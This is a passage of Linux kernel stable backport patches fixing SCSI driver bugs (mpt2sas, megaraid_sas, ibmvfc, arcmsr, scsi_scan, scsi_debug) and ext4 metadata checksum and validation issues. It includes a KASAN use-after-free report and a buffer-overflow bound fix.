(!scmd) continue; count++; - if (ata_12_16_cmd(scmd)) - scsi_internal_device_unblock(scmd->device, - SDEV_RUNNING); + _scsih_set_satl_pending(scmd, false); mpt3sas_base_free_smid(ioc, smid); scsi_dma_unmap(scmd); if (ioc->pci_error_recovery) @@ -3550,13 +3557,6 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *)) scsi_print_command(scmd); #endif - /* - * Lock the device for any subsequent command until command is - * done. - */ - if (ata_12_16_cmd(scmd)) - scsi_internal_device_block(scmd->device); - scmd->scsi_done = done; sas_device_priv_data = scmd->device->hostdata; if (!sas_device_priv_data || !sas_device_priv_data->sas_target) { @@ -3571,6 +3571,19 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *)) return 0; } + /* + * Bug work around for firmware SATL handling. The loop + * is based on atomic operations and ensures consistency + * since we're lockless at this point + */ + do { + if (test_bit(0, &sas_device_priv_data->ata_command_pending)) { + scmd->result = SAM_STAT_BUSY; + scmd->scsi_done(scmd); + return 0; + } + } while (_scsih_set_satl_pending(scmd, true)); + sas_target_priv_data = sas_device_priv_data->sas_target; /* invalid device handle */ @@ -4060,8 +4073,7 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply) if (scmd == NULL) return 1; - if (ata_12_16_cmd(scmd)) - scsi_internal_device_unblock(scmd->device, SDEV_RUNNING); + _scsih_set_satl_pending(scmd, false); mpi_request = mpt3sas_base_get_msg_frame(ioc, smid); From 0ae497609a677f4929cab8bf0f8d81a1d7c27438 Mon Sep 17 00:00:00 2001 From: Andrey Grodzovsky Date: Wed, 16 Nov 2016 20:15:08 -0500 Subject: [PATCH 145/315] mpt2sas: Fix secure erase premature termination Problem: This is a work around for a bug with LSI Fusion MPT SAS2 when pefroming secure erase. Due to the very long time the operation takes commands issued during the erase will time out and will trigger execution of abort hook. Even though the abort hook is called for the specific command which timed out this leads to entire device halt (scsi_state terminated) and premature termination of the secured erase. Fix: Set device state to busy while erase in progress to reject any incoming commands until the erase is done. The device is blocked any way during this time and cannot execute any other command. More data and logs can be found here - https://drive.google.com/file/d/0B9ocOHYHbbS1Q3VMdkkzeWFkTjg/view P.S This is a backport from the same fix for mpt3sas driver intended for pre-4.4 stable trees. Signed-off-by: Andrey Grodzovsky Cc: Sreekanth Reddy Cc: Hannes Reinecke Cc: PDL-MPT-FUSIONLINUX Cc: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/mpt2sas/mpt2sas_scsih.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/drivers/scsi/mpt2sas/mpt2sas_scsih.c b/drivers/scsi/mpt2sas/mpt2sas_scsih.c index fe76185cd79..64caa5ce323 100644 --- a/drivers/scsi/mpt2sas/mpt2sas_scsih.c +++ b/drivers/scsi/mpt2sas/mpt2sas_scsih.c @@ -3926,6 +3926,11 @@ _scsih_setup_direct_io(struct MPT2SAS_ADAPTER *ioc, struct scsi_cmnd *scmd, } } +static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) +{ + return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); +} + /** * _scsih_qcmd - main scsi request entry point * @scmd: pointer to scsi command object @@ -3948,6 +3953,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *)) u32 mpi_control; u16 smid; + /** + * Lock the device for any subsequent command until + * command is done. + */ + if (ata_12_16_cmd(scmd)) + scsi_internal_device_block(scmd->device); + scmd->scsi_done = done; sas_device_priv_data = scmd->device->hostdata; if (!sas_device_priv_data || !sas_device_priv_data->sas_target) { @@ -4454,6 +4466,9 @@ _scsih_io_done(struct MPT2SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply) if (scmd == NULL) return 1; + if (ata_12_16_cmd(scmd)) + scsi_internal_device_unblock(scmd->device, SDEV_RUNNING); + mpi_request = mpt2sas_base_get_msg_frame(ioc, smid); if (mpi_reply == NULL) { From 00360043a132da6d3870a1ea692ae1a5f5182eb8 Mon Sep 17 00:00:00 2001 From: Kashyap Desai Date: Fri, 21 Oct 2016 06:33:32 -0700 Subject: [PATCH 146/315] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices commit 1e793f6fc0db920400574211c48f9157a37e3945 upstream. Commit 02b01e010afe ("megaraid_sas: return sync cache call with success") modified the driver to successfully complete SYNCHRONIZE_CACHE commands without passing them to the controller. Disk drive caches are only explicitly managed by controller firmware when operating in RAID mode. So this commit effectively disabled writeback cache flushing for any drives used in JBOD mode, leading to data integrity failures. [mkp: clarified patch description] Fixes: 02b01e010afeeb49328d35650d70721d2ca3fd59 Signed-off-by: Kashyap Desai Signed-off-by: Sumit Saxena Reviewed-by: Tomas Henzl Reviewed-by: Hannes Reinecke Reviewed-by: Ewan D. Milne Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/megaraid/megaraid_sas_base.c | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c index 6ced6a398d6..0626a168c55 100644 --- a/drivers/scsi/megaraid/megaraid_sas_base.c +++ b/drivers/scsi/megaraid/megaraid_sas_base.c @@ -1487,16 +1487,13 @@ megasas_queue_command_lck(struct scsi_cmnd *scmd, void (*done) (struct scsi_cmnd goto out_done; } - switch (scmd->cmnd[0]) { - case SYNCHRONIZE_CACHE: - /* - * FW takes care of flush cache on its own - * No need to send it down - */ + /* + * FW takes care of flush cache on its own for Virtual Disk. + * No need to send it down for VD. For JBOD send SYNCHRONIZE_CACHE to FW. + */ + if ((scmd->cmnd[0] == SYNCHRONIZE_CACHE) && MEGASAS_IS_LOGICAL(scmd)) { scmd->result = DID_OK << 16; goto out_done; - default: - break; } if (instance->instancet->build_and_issue_cmd(instance, scmd)) { From bb3445f8b33687172a5f82c3be777ef1dc1637db Mon Sep 17 00:00:00 2001 From: Sumit Saxena Date: Wed, 9 Nov 2016 02:59:42 -0800 Subject: [PATCH 147/315] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression commit 5e5ec1759dd663a1d5a2f10930224dd009e500e8 upstream. This patch will fix regression caused by commit 1e793f6fc0db ("scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices"). The problem was that the MEGASAS_IS_LOGICAL macro did not have braces and as a result the driver ended up exposing a lot of non-existing SCSI devices (all SCSI commands to channels 1,2,3 were returned as SUCCESS-DID_OK by driver). [mkp: clarified patch description] Fixes: 1e793f6fc0db920400574211c48f9157a37e3945 Reported-by: Jens Axboe Signed-off-by: Kashyap Desai Signed-off-by: Sumit Saxena Tested-by: Sumit Saxena Reviewed-by: Tomas Henzl Tested-by: Jens Axboe Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/megaraid/megaraid_sas.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h index 280e769a168..a0e0a61dc88 100644 --- a/drivers/scsi/megaraid/megaraid_sas.h +++ b/drivers/scsi/megaraid/megaraid_sas.h @@ -1402,7 +1402,7 @@ struct megasas_instance_template { }; #define MEGASAS_IS_LOGICAL(scp) \ - (scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1 + ((scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1) #define MEGASAS_DEV_INDEX(inst, scp) \ ((scp->device->channel % 2) * MEGASAS_MAX_DEV_PER_CHANNEL) + \ From f6e64a44939b18507ba44877eb6bb2c69cfadc2d Mon Sep 17 00:00:00 2001 From: Brian King Date: Mon, 19 Sep 2016 08:59:19 -0500 Subject: [PATCH 148/315] scsi: ibmvfc: Fix I/O hang when port is not mapped commit 07d0e9a847401ffd2f09bd450d41644cd090e81d upstream. If a VFC port gets unmapped in the VIOS, it may not respond with a CRQ init complete following H_REG_CRQ. If this occurs, we can end up having called scsi_block_requests and not a resulting unblock until the init complete happens, which may never occur, and we end up hanging I/O requests. This patch ensures the host action stay set to IBMVFC_HOST_ACTION_TGT_DEL so we move all rports into devloss state and unblock unless we receive an init complete. Signed-off-by: Brian King Acked-by: Tyrel Datwyler Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/ibmvscsi/ibmvfc.c | 1 - 1 file changed, 1 deletion(-) diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c index 4e31caa21dd..92068615531 100644 --- a/drivers/scsi/ibmvscsi/ibmvfc.c +++ b/drivers/scsi/ibmvscsi/ibmvfc.c @@ -717,7 +717,6 @@ static int ibmvfc_reset_crq(struct ibmvfc_host *vhost) spin_lock_irqsave(vhost->host->host_lock, flags); vhost->state = IBMVFC_NO_CRQ; vhost->logged_in = 0; - ibmvfc_set_host_action(vhost, IBMVFC_HOST_ACTION_NONE); /* Clean out the queue */ memset(crq->msgs, 0, PAGE_SIZE); From ba02e936939e98b873dd4ab18c78464695589fef Mon Sep 17 00:00:00 2001 From: Ming Lei Date: Sun, 9 Oct 2016 13:23:27 +0800 Subject: [PATCH 149/315] scsi: Fix use-after-free commit bcd8f2e94808fcddf6ef3af5f060a36820dcc432 upstream. This patch fixes one use-after-free report[1] by KASAN. In __scsi_scan_target(), when a type 31 device is probed, SCSI_SCAN_TARGET_PRESENT is returned and the target will be scanned again. Inside the following scsi_report_lun_scan(), one new scsi_device instance is allocated, and scsi_probe_and_add_lun() is called again to probe the target and still see type 31 device, finally __scsi_remove_device() is called to remove & free the device at the end of scsi_probe_and_add_lun(), so cause use-after-free in scsi_report_lun_scan(). And the following SCSI log can be observed: scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36 scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0 scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added scsi 0:0:2:0: scsi scan: Sending REPORT LUNS to (try 0) scsi 0:0:2:0: scsi scan: REPORT LUNS successful (try 0) result 0x0 scsi 0:0:2:0: scsi scan: REPORT LUN scan scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36 scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0 scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added BUG: KASAN: use-after-free in __scsi_scan_target+0xbf8/0xe40 at addr ffff88007b44a104 This patch fixes the issue by moving the putting reference at the end of scsi_report_lun_scan(). [1] KASAN report ================================================================== [ 3.274597] PM: Adding info for serio:serio1 [ 3.275127] BUG: KASAN: use-after-free in __scsi_scan_target+0xd87/0xdf0 at addr ffff880254d8c304 [ 3.275653] Read of size 4 by task kworker/u10:0/27 [ 3.275903] CPU: 3 PID: 27 Comm: kworker/u10:0 Not tainted 4.8.0 #2121 [ 3.276258] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 3.276797] Workqueue: events_unbound async_run_entry_fn [ 3.277083] ffff880254d8c380 ffff880259a37870 ffffffff94bbc6c1 ffff880078402d80 [ 3.277532] ffff880254d8bb80 ffff880259a37898 ffffffff9459fec1 ffff880259a37930 [ 3.277989] ffff880254d8bb80 ffff880078402d80 ffff880259a37920 ffffffff945a0165 [ 3.278436] Call Trace: [ 3.278528] [] dump_stack+0x65/0x84 [ 3.278797] [] kasan_object_err+0x21/0x70 [ 3.279063] device: 'psaux': device_add [ 3.279616] [] kasan_report_error+0x205/0x500 [ 3.279651] PM: Adding info for No Bus:psaux [ 3.280202] [] ? kfree_const+0x22/0x30 [ 3.280486] [] ? kobject_release+0x119/0x370 [ 3.280805] [] __asan_report_load4_noabort+0x43/0x50 [ 3.281170] [] ? __scsi_scan_target+0xd87/0xdf0 [ 3.281506] [] __scsi_scan_target+0xd87/0xdf0 [ 3.281848] [] ? scsi_add_device+0x30/0x30 [ 3.282156] [] ? pm_runtime_autosuspend_expiration+0x60/0x60 [ 3.282570] [] ? _raw_spin_lock+0x17/0x40 [ 3.282880] [] scsi_scan_channel+0x105/0x160 [ 3.283200] [] scsi_scan_host_selected+0x212/0x2f0 [ 3.283563] [] do_scsi_scan_host+0x1bc/0x250 [ 3.283882] [] do_scan_async+0x41/0x450 [ 3.284173] [] async_run_entry_fn+0xfe/0x610 [ 3.284492] [] ? pwq_dec_nr_in_flight+0x124/0x2a0 [ 3.284876] [] ? preempt_count_add+0x130/0x160 [ 3.285207] [] process_one_work+0x544/0x12d0 [ 3.285526] [] worker_thread+0xd9/0x12f0 [ 3.285844] [] ? process_one_work+0x12d0/0x12d0 [ 3.286182] [] kthread+0x1c5/0x260 [ 3.286443] [] ? __switch_to+0x88d/0x1430 [ 3.286745] [] ? kthread_worker_fn+0x5a0/0x5a0 [ 3.287085] [] ret_from_fork+0x1f/0x40 [ 3.287368] [] ? kthread_worker_fn+0x5a0/0x5a0 [ 3.287697] Object at ffff880254d8bb80, in cache kmalloc-2048 size: 2048 [ 3.288064] Allocated: [ 3.288147] PID = 27 [ 3.288218] [] save_stack_trace+0x2b/0x50 [ 3.288531] [] save_stack+0x46/0xd0 [ 3.288806] [] kasan_kmalloc+0xad/0xe0 [ 3.289098] [] __kmalloc+0x13e/0x250 [ 3.289378] [] scsi_alloc_sdev+0xea/0xcf0 [ 3.289701] [] __scsi_scan_target+0xa06/0xdf0 [ 3.290034] [] scsi_scan_channel+0x105/0x160 [ 3.290362] [] scsi_scan_host_selected+0x212/0x2f0 [ 3.290724] [] do_scsi_scan_host+0x1bc/0x250 [ 3.291055] [] do_scan_async+0x41/0x450 [ 3.291354] [] async_run_entry_fn+0xfe/0x610 [ 3.291695] [] process_one_work+0x544/0x12d0 [ 3.292022] [] worker_thread+0xd9/0x12f0 [ 3.292325] [] kthread+0x1c5/0x260 [ 3.292594] [] ret_from_fork+0x1f/0x40 [ 3.292886] Freed: [ 3.292945] PID = 27 [ 3.293016] [] save_stack_trace+0x2b/0x50 [ 3.293327] [] save_stack+0x46/0xd0 [ 3.293600] [] kasan_slab_free+0x71/0xb0 [ 3.293916] [] kfree+0xa2/0x1f0 [ 3.294168] [] scsi_device_dev_release_usercontext+0x50a/0x730 [ 3.294598] [] execute_in_process_context+0xda/0x130 [ 3.294974] [] scsi_device_dev_release+0x1c/0x20 [ 3.295322] [] device_release+0x76/0x1e0 [ 3.295626] [] kobject_release+0x107/0x370 [ 3.295942] [] kobject_put+0x4e/0xa0 [ 3.296222] [] put_device+0x17/0x20 [ 3.296497] [] scsi_device_put+0x7c/0xa0 [ 3.296801] [] __scsi_scan_target+0xd4c/0xdf0 [ 3.297132] [] scsi_scan_channel+0x105/0x160 [ 3.297458] [] scsi_scan_host_selected+0x212/0x2f0 [ 3.297829] [] do_scsi_scan_host+0x1bc/0x250 [ 3.298156] [] do_scan_async+0x41/0x450 [ 3.298453] [] async_run_entry_fn+0xfe/0x610 [ 3.298777] [] process_one_work+0x544/0x12d0 [ 3.299105] [] worker_thread+0xd9/0x12f0 [ 3.299408] [] kthread+0x1c5/0x260 [ 3.299676] [] ret_from_fork+0x1f/0x40 [ 3.299967] Memory state around the buggy address: [ 3.300209] ffff880254d8c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 3.300608] ffff880254d8c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 3.300986] >ffff880254d8c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 3.301408] ^ [ 3.301550] ffff880254d8c380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 3.301987] ffff880254d8c400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3.302396] ================================================================== Cc: Christoph Hellwig Signed-off-by: Ming Lei Reviewed-by: Christoph Hellwig Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/scsi_scan.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c index 859240408f9..92d4f65cbc2 100644 --- a/drivers/scsi/scsi_scan.c +++ b/drivers/scsi/scsi_scan.c @@ -1517,12 +1517,12 @@ static int scsi_report_lun_scan(struct scsi_target *starget, int bflags, out_err: kfree(lun_data); out: - scsi_device_put(sdev); if (scsi_device_created(sdev)) /* * the sdev we used didn't appear in the report luns scan */ __scsi_remove_device(sdev); + scsi_device_put(sdev); return ret; } From 7a03031a5dbd7f479e8e8555286098e83cba996c Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 15 Sep 2016 16:44:56 +0300 Subject: [PATCH 150/315] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() commit 7bc2b55a5c030685b399bb65b6baa9ccc3d1f167 upstream. We need to put an upper bound on "user_len" so the memcpy() doesn't overflow. [js] no ARCMSR_API_DATA_BUFLEN defined, use the number Reported-by: Marco Grassi Signed-off-by: Dan Carpenter Reviewed-by: Tomas Henzl Signed-off-by: Martin K. Petersen Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- drivers/scsi/arcmsr/arcmsr_hba.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c index 1822cb9ec62..66dda86e62e 100644 --- a/drivers/scsi/arcmsr/arcmsr_hba.c +++ b/drivers/scsi/arcmsr/arcmsr_hba.c @@ -1803,7 +1803,8 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb, case ARCMSR_MESSAGE_WRITE_WQBUFFER: { unsigned char *ver_addr; - int32_t my_empty_len, user_len, wqbuf_firstindex, wqbuf_lastindex; + uint32_t user_len; + int32_t my_empty_len, wqbuf_firstindex, wqbuf_lastindex; uint8_t *pQbuffer, *ptmpuserbuffer; ver_addr = kmalloc(1032, GFP_ATOMIC); @@ -1820,6 +1821,11 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb, } ptmpuserbuffer = ver_addr; user_len = pcmdmessagefld->cmdmessage.Length; + if (user_len > 1032) { + retvalue = ARCMSR_MESSAGE_FAIL; + kfree(ver_addr); + goto message_out; + } memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len); wqbuf_lastindex = acb->wqbuf_lastindex; wqbuf_firstindex = acb->wqbuf_firstindex; From bdf7e17f56c3470877e87cabcf44197fff89b190 Mon Sep 17 00:00:00 2001 From: "Ewan D. Milne" Date: Wed, 26 Oct 2016 11:22:53 -0400 Subject: [PATCH 151/315] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded commit 4d2b496f19f3c2cfaca1e8fa0710688b5ff3811d upstream. map_storep was not being vfree()'d in the module_exit call. Signed-off-by: Ewan D. Milne Reviewed-by: Laurence Oberman Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/scsi_debug.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/scsi/scsi_debug.c b/drivers/scsi/scsi_debug.c index 0a537a0515c..be86e7a02bb 100644 --- a/drivers/scsi/scsi_debug.c +++ b/drivers/scsi/scsi_debug.c @@ -3504,6 +3504,7 @@ static void __exit scsi_debug_exit(void) bus_unregister(&pseudo_lld_bus); root_device_unregister(pseudo_primary); + vfree(map_storep); if (dif_storep) vfree(dif_storep); From 9c30efd6a204eb24ca23fbb3b4e1813a38abd0d4 Mon Sep 17 00:00:00 2001 From: Ching Huang Date: Wed, 19 Oct 2016 17:50:26 +0800 Subject: [PATCH 152/315] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware commit 2bf7dc8443e113844d078fd6541b7f4aa544f92f upstream. The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller firmware. Depending on how drive caches are handled internally by controller firmware this could potentially lead to data integrity problems. Ensure that cache flushes are passed to the controller. [mkp: applied by hand and removed unused vars] Signed-off-by: Ching Huang Reported-by: Tomas Henzl Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/arcmsr/arcmsr_hba.c | 9 --------- 1 file changed, 9 deletions(-) diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c index 66dda86e62e..8d9477cc322 100644 --- a/drivers/scsi/arcmsr/arcmsr_hba.c +++ b/drivers/scsi/arcmsr/arcmsr_hba.c @@ -2069,18 +2069,9 @@ static int arcmsr_queue_command_lck(struct scsi_cmnd *cmd, struct AdapterControlBlock *acb = (struct AdapterControlBlock *) host->hostdata; struct CommandControlBlock *ccb; int target = cmd->device->id; - int lun = cmd->device->lun; - uint8_t scsicmd = cmd->cmnd[0]; cmd->scsi_done = done; cmd->host_scribble = NULL; cmd->result = 0; - if ((scsicmd == SYNCHRONIZE_CACHE) ||(scsicmd == SEND_DIAGNOSTIC)){ - if(acb->devstate[target][lun] == ARECA_RAID_GONE) { - cmd->result = (DID_NO_CONNECT << 16); - } - cmd->scsi_done(cmd); - return 0; - } if (target == 16) { /* virtual device for iop message transfer */ arcmsr_handle_virtual_command(acb, cmd); From 7d506613724a5b9f6b4b80a1587e9300f1a2bbaf Mon Sep 17 00:00:00 2001 From: Theodore Ts'o Date: Mon, 1 Aug 2016 00:51:02 -0400 Subject: [PATCH 153/315] ext4: validate that metadata blocks do not overlap superblock commit 829fa70dddadf9dd041d62b82cd7cea63943899d upstream. A number of fuzzing failures seem to be caused by allocation bitmaps or other metadata blocks being pointed at the superblock. This can cause kernel BUG or WARNings once the superblock is overwritten, so validate the group descriptor blocks to make sure this doesn't happen. Signed-off-by: Theodore Ts'o Signed-off-by: Willy Tarreau --- fs/ext4/super.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/fs/ext4/super.c b/fs/ext4/super.c index 15a81897df4..a6966c95404 100644 --- a/fs/ext4/super.c +++ b/fs/ext4/super.c @@ -2002,6 +2002,7 @@ void ext4_group_desc_csum_set(struct super_block *sb, __u32 block_group, /* Called at mount-time, super-block is locked */ static int ext4_check_descriptors(struct super_block *sb, + ext4_fsblk_t sb_block, ext4_group_t *first_not_zeroed) { struct ext4_sb_info *sbi = EXT4_SB(sb); @@ -2032,6 +2033,11 @@ static int ext4_check_descriptors(struct super_block *sb, grp = i; block_bitmap = ext4_block_bitmap(sb, gdp); + if (block_bitmap == sb_block) { + ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " + "Block bitmap for group %u overlaps " + "superblock", i); + } if (block_bitmap < first_block || block_bitmap > last_block) { ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " "Block bitmap for group %u not in group " @@ -2039,6 +2045,11 @@ static int ext4_check_descriptors(struct super_block *sb, return 0; } inode_bitmap = ext4_inode_bitmap(sb, gdp); + if (inode_bitmap == sb_block) { + ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " + "Inode bitmap for group %u overlaps " + "superblock", i); + } if (inode_bitmap < first_block || inode_bitmap > last_block) { ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " "Inode bitmap for group %u not in group " @@ -2046,6 +2057,11 @@ static int ext4_check_descriptors(struct super_block *sb, return 0; } inode_table = ext4_inode_table(sb, gdp); + if (inode_table == sb_block) { + ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " + "Inode table for group %u overlaps " + "superblock", i); + } if (inode_table < first_block || inode_table + sbi->s_itb_per_group - 1 > last_block) { ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: " @@ -3766,7 +3782,7 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent) goto failed_mount2; } } - if (!ext4_check_descriptors(sb, &first_not_zeroed)) { + if (!ext4_check_descriptors(sb, logical_sb_block, &first_not_zeroed)) { ext4_msg(sb, KERN_ERR, "group descriptors corrupted!"); goto failed_mount2; } From 3a45bbb2f9eb5ff7ab7dce23443a9355a74c9c74 Mon Sep 17 00:00:00 2001 From: Daeho Jeong Date: Sun, 3 Jul 2016 17:51:39 -0400 Subject: [PATCH 154/315] ext4: avoid modifying checksum fields directly during checksum verification commit b47820edd1634dc1208f9212b7ecfb4230610a23 upstream. We temporally change checksum fields in buffers of some types of metadata into '0' for verifying the checksum values. By doing this without locking the buffer, some metadata's checksums, which are being committed or written back to the storage, could be damaged. In our test, several metadata blocks were found with damaged metadata checksum value during recovery process. When we only verify the checksum value, we have to avoid modifying checksum fields directly. Signed-off-by: Daeho Jeong Signed-off-by: Youngjin Gil Signed-off-by: Theodore Ts'o Reviewed-by: Darrick J. Wong Signed-off-by: Willy Tarreau --- fs/ext4/inode.c | 38 ++++++++++++++++++++++---------------- fs/ext4/namei.c | 9 ++++----- fs/ext4/super.c | 18 +++++++++--------- fs/ext4/xattr.c | 13 +++++++------ 4 files changed, 42 insertions(+), 36 deletions(-) diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c index 221b5829884..046e0e13a28 100644 --- a/fs/ext4/inode.c +++ b/fs/ext4/inode.c @@ -53,26 +53,32 @@ static __u32 ext4_inode_csum(struct inode *inode, struct ext4_inode *raw, struct ext4_inode_info *ei) { struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb); - __u16 csum_lo; - __u16 csum_hi = 0; __u32 csum; + __u16 dummy_csum = 0; + int offset = offsetof(struct ext4_inode, i_checksum_lo); + unsigned int csum_size = sizeof(dummy_csum); - csum_lo = le16_to_cpu(raw->i_checksum_lo); - raw->i_checksum_lo = 0; - if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE && - EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) { - csum_hi = le16_to_cpu(raw->i_checksum_hi); - raw->i_checksum_hi = 0; + csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw, offset); + csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, csum_size); + offset += csum_size; + csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset, + EXT4_GOOD_OLD_INODE_SIZE - offset); + + if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE) { + offset = offsetof(struct ext4_inode, i_checksum_hi); + csum = ext4_chksum(sbi, csum, (__u8 *)raw + + EXT4_GOOD_OLD_INODE_SIZE, + offset - EXT4_GOOD_OLD_INODE_SIZE); + if (EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) { + csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, + csum_size); + offset += csum_size; + csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset, + EXT4_INODE_SIZE(inode->i_sb) - + offset); + } } - csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw, - EXT4_INODE_SIZE(inode->i_sb)); - - raw->i_checksum_lo = cpu_to_le16(csum_lo); - if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE && - EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) - raw->i_checksum_hi = cpu_to_le16(csum_hi); - return csum; } diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c index facf8590b71..407bcf79aa3 100644 --- a/fs/ext4/namei.c +++ b/fs/ext4/namei.c @@ -417,15 +417,14 @@ static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent, struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb); struct ext4_inode_info *ei = EXT4_I(inode); __u32 csum; - __le32 save_csum; int size; + __u32 dummy_csum = 0; + int offset = offsetof(struct dx_tail, dt_checksum); size = count_offset + (count * sizeof(struct dx_entry)); - save_csum = t->dt_checksum; - t->dt_checksum = 0; csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)dirent, size); - csum = ext4_chksum(sbi, csum, (__u8 *)t, sizeof(struct dx_tail)); - t->dt_checksum = save_csum; + csum = ext4_chksum(sbi, csum, (__u8 *)t, offset); + csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum)); return cpu_to_le32(csum); } diff --git a/fs/ext4/super.c b/fs/ext4/super.c index a6966c95404..6cf69fa212f 100644 --- a/fs/ext4/super.c +++ b/fs/ext4/super.c @@ -1936,23 +1936,25 @@ failed: static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group, struct ext4_group_desc *gdp) { - int offset; + int offset = offsetof(struct ext4_group_desc, bg_checksum); __u16 crc = 0; __le32 le_group = cpu_to_le32(block_group); if ((sbi->s_es->s_feature_ro_compat & cpu_to_le32(EXT4_FEATURE_RO_COMPAT_METADATA_CSUM))) { /* Use new metadata_csum algorithm */ - __le16 save_csum; __u32 csum32; + __u16 dummy_csum = 0; - save_csum = gdp->bg_checksum; - gdp->bg_checksum = 0; csum32 = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&le_group, sizeof(le_group)); - csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp, - sbi->s_desc_size); - gdp->bg_checksum = save_csum; + csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp, offset); + csum32 = ext4_chksum(sbi, csum32, (__u8 *)&dummy_csum, + sizeof(dummy_csum)); + offset += sizeof(dummy_csum); + if (offset < sbi->s_desc_size) + csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp + offset, + sbi->s_desc_size - offset); crc = csum32 & 0xFFFF; goto out; @@ -1963,8 +1965,6 @@ static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group, cpu_to_le32(EXT4_FEATURE_RO_COMPAT_GDT_CSUM))) return 0; - offset = offsetof(struct ext4_group_desc, bg_checksum); - crc = crc16(~0, sbi->s_es->s_uuid, sizeof(sbi->s_es->s_uuid)); 